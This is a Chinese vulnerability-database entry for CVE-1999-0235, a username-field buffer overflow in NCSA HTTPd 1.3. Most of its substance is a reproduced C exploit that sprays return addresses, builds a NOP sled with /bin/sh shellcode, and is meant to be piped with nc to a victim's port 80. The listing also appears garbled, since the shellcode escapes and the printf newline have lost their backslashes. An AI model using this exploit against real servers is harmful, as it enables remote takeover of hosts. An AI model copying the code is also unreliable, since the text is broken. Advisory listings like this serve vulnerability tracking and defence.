NCSA WebServer缓冲区溢出漏洞

NCSA WebServer缓冲区溢出漏洞

漏洞ID 1105238 漏洞类型 缓冲区溢出
发布时间 1995-02-17 更新时间 2005-10-20
图片[1]-NCSA WebServer缓冲区溢出漏洞-安全小百科CVE编号 CVE-1999-0235
图片[2]-NCSA WebServer缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-199502-002
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/21050
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199502-002
|漏洞详情
NCSAWebServer(1.4.1及其以下版本)存在缓冲区溢出漏洞。该漏洞允许远程访问。
|漏洞EXP
source: http://www.securityfocus.com/bid/3158/info
 
NCSA HTTPd is a free, open-source web server for *nix systems.
 
NCSA HTTPd versions 1.3 and earlier are prone to an exploitable buffer overflow(in the username field) which will allow malicious remote users to execute arbitrary code with the privileges of the webserver process.
 
Successful exploitation of this vulnerability will allow a remote attacker to gain local access to the host. 

/*     
; NCSA Webserver Buffer Overflow in 1.3 
; 	By Xtremist ([email protected]) for [r00tabega.security.labs]
; Tested on Slackware 4.0 with NCSA 1.3  
;     usage:
; 	$ (ncsaexpl 0; cat) | nc victim 80
;                   
;                    OFFSET usually from -1000 to 1000 
;   greets all people i know :)
;*/

#include <stdio.h>

unsigned char shell[] = /*  alphae1's shellcode for execve */
  "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
  "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
  "x80xe8xdcxffxffxff/bin/sh";


char user[264];

long get_esp(void) {
	__asm__("movl %esp,%eax");
}

int main(int argc,char **argv){ 

int i; int offset=160;
long ret;
if(argc>1) {
  offset=atoi(argv[1]);
}
ret=(get_esp()-offset);

for(i=1;i<264;i+=4){
*(long *)&user[i]=ret;
}

for(i=0;i<(260-strlen(shell));i++) {
*(user+i)=0x90; /*NOP*/
}

memcpy(shell+i,shell,strlen(shell));

printf("GET %sn", user);

}
|参考资料
VulnerablesoftwareandversionsConfiguration1OR*cpe:/a:ncsa:ncsa_web_server:1.3*cpe:/a:ncsa:ncsa_web_server:1.4*cpe:/a:ncsa:ncsa_web_server:1.4.1*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0235

相关推荐: forum.pl权限管理和访问控制漏洞

forum.pl权限管理和访问控制漏洞 漏洞ID 1199467 漏洞类型 未知 发布时间 2005-05-02 更新时间 2005-05-02 CVE编号 CVE-2005-1353 CNNVD-ID CNNVD-200505-513 漏洞平台 N/A CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享